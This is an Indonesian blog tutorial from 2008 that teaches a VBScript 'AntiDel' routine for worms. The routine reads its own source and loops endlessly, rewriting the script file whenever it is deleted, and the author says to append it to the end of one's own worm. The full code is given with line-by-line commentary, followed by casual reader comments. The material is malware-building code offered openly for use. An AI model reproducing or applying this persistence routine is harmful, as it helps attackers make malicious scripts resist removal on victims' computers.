Root » Tutorial » Vbs AntiDel

Vbs AntiDel

Tutorial ini ditulis pada December 2008

Mungkin saat ini Tutorial "Vbs AntiDel" sedikit berubah atau tidak berlaku lagi, Silahkan disesuaikan. Terima Kasih

Vbs AntiDel

Ditulis oleh : [K]alamar -Argentina-
Rewrite bY : jH3ZeR

Bagaimana cara worm yang kita buat sangat susah untuk dihapus walaupun sudah didelete berkali-kali dari kompie…heheheheh….. ini ada function khusus yang ditulis oleh [K]alamar, seorang anak argentina berusia 18 tahun pembuat VBSWG yang bikin dunia IT gempar.

liat function ini :

—————————————–code dimulai

dim fso, myself,mytext
set fso = createobject(“scripting.filesystemobject”)
set myself = fso.opentextfile(wscript.scriptfullname)
mytext = myself.readall
myself.close
do

if fso.fileexists(wscript.scriptfullname) = false then

set myself = fso.createtextfile(wscript.scriptfullname)
myself.write mytext
myself.close

end if

loop

————————————-berakhir dsini

dim fso, myself,mytext
– Ngedeklarasiin variabel

set fso = createobject(“scripting.filesystemobject”)
– Biasaaa.. bikin file system objek

set myself = fso.opentextfile(wscript.scriptfullname)
– Bikin texttream objek memakai file vbs

mytext = myself.readall
– Meletakan semua file vbs dalam vatiabel mytext

myself.close
– Nutup textream

do
– Lakukaaaaannnnnnnnnnnnnnnnn…………..!!!!!

if fso.fileexists(wscript.scriptfullname) = false then

– Mereksa apakah worm kita masih masiha ada apa engga ? jika udah diapus maka….

set myself = fso.createtextfile(wscript.scriptfullname)

– worm akan dibuat lagi….heheheh….

myself.write mytext
– Nulis semua variabel textream yang udah kita buat tadi

myself.close
-Nutup

end if
Nutup kondisi

loop
– Mengulangi langkah2 diatasnya….

You musti ngeletakin script diatas pada baris terakhir worm yang you udah buat karna jika you meletakan ditengah apalagi diatas maka script worm yang you buat ga mungkin dibaca semua semuanya….

Rewriten bY : jH3ZeR

Twitter

JhezeR

Engineer | Blogger | Pencari Ilmu | Internet Maniak | Pemburu Kesuk$e$an | Penikmat Musik, Film & Pertandingan | Interisti | Muser

telah mempunyai 236 Tulisan di JhezeR.com

Tutorial » »
Vbs AntiDel Reviewed by JhezeR on . Sebuah Tulisan tentang Vbs AntiDel @JhezeR.com

Vbs AntiDel Ditulis oleh : [K]alamar -Argentina- Rewrite bY : jH3ZeR Bagaimana cara worm yang kita buat sangat susah untuk dihapus walaupun sudah didelete berkali-kali dari kompie…heheheheh….. ini ada function khusus yang ditulis oleh [K]alamar, seorang anak argentina berusia 18 tahun pembuat VBSWG yang bikin dunia IT gempar. liat function ini : —————————————–code dimulai dim

Rating: 5

6 Komentar "Vbs AntiDel"


  1. tomi | 103 Komentar + ♥♥♥
    December 28th, 2010 @ 12:42

    apakah pertamax?? :bata

    Balas Yoo

    tomi |

    ternyata ia hehe..
    ini berarti bs digunakan utk membasmi win32 sality mas? soalnya itu susah banget e

    Balas Yoo

  2. [ JhezeR ] | 1760 Komentar +
    December 28th, 2010 @ 13:21

    Hehe gak tw juga mas,lagian itu script jadul, cuma bwt iseng2. Dulu kan blum ada sality, dicoba aja mas mana tw bisa basmi sality :silau

    Balas Yoo

    tomi |

    ihiii.. akhirnya blog saya sembuh mas 😀

    buka postingan ini, kok avast securitynya nyala ya mas..

    Balas Yoo

  3. adizone23 | 71 Komentar + ♥♥♥
    December 28th, 2010 @ 22:26

    coba memahami dahulu… saya kurang mengerti dengan VB
    :bingung

    Balas Yoo

  4. hosnan fauzi | 1 Komentar +
    December 29th, 2010 @ 02:53

    wah… saya pusing…. heheh… makin gak mudeng mas… :takut :takut

    Balas Yoo

Halo, Silahkan Tinggalkan Jejak Komentarnya Yoo...